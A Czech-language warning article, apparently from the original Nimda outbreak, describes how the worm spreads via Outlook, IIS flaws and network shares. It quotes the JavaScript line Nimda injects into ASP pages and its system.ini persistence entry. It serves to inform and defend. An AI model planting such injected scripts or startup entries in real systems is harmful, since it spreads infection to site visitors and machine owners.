Stačí otevřít Outlook a mít jen zapnuté okno s náhledem. Ani nevíte jak a už pomalu instalujete nového značně nepříjemného červa.
Včera se začal během dne velmi rychle šířit nový virus W32/Nimda.A. Připojen je jako příloha e-mailu s názvem "
readme.exe". Pokud dostanete poštu s takovýmto souborem v žádném případě ho nespouštějte! Tělo emailu je prázdné (ovšem u programů Microsoft Outlook nebo Outlook Express může být využito chyby pro automatické spuštění), hlavička e-mailu je generována náhodně.
Červ je schopen se automaticky iniciovat v rámci Outlooku i Outlook Expressu. Automatické spuštění v Outlooku virus nenainstaluje, pouze automaticky nabídne ke spuštění soubor readme.exe a spustí přehrávač nastavený pro spouštění WAV souborů (MIME typ přílohy je WAV soubor). Je více než doporučená instalace posledních záplat na Outlook.
Po spuštění se virus nakopíruje do systémového adresáře jako load.exe a do TEMP adresáře jako MEP*.TMP.EXE. Modifikuje soubor riched20.dll. Soubor riched20.dll je používán pro práci se soubory RTF, například ve Wordpadu. Modifikuje i legitimní soubory jako mmc.exe a možná i jiné.
Pokud máte nainstalován IIS s neopravenou chybou Unicode Web Traversal Exploit vytváří i soubory ADMIN.DLL v adresářích c:, d: a c:\Inetpub\scripts. Do ASP souborů přidává následující kód <script language="JavaScript">window.open("readme.eml", null, resizable=no,top=6000,left=6000")</script>. Nemusí to být pouze soubor readme.eml je nahrazován i soubory něco.eml.
Aby mohl být virus spuštěn s každým startem počítače modifikuje soubor system.ini, kam přidá řádek:
shell=explorer.exe load.exe -dontrunold
Co provádí dále?
Rozešle se na všechny emailové adresy kolegů ve vašem adresáři, hledá pozůstatky po červu Code Red a využívá hromady dalších slabin MS IIS, například scanuje další počítače, kde pase po cmd.exe. Infikuje servery s MS IIS vzájemně mezi sebou, podobně jako Code Red. Ve Windows NT využívá tftp.exe pro další šíření viru. Poslední věc, kterou se mně podařilo o viru zjistit je, že Windows NT a 2000 aktivuje Guest přístup bez hesla a přidá ho do skupiny Administrators. Poté nasdílí adresář C:\ se všemi přístupovými právy.
Počty requestů jsou údajně mnohem větší než byly u Code Red (uvádí se 10krát, někde až 100krát početnější). Servery mohou začít být nepřístupné (DoS). Rychlá a bezplatná odinstalace jako například u Sircamu není zatím k dispozici :(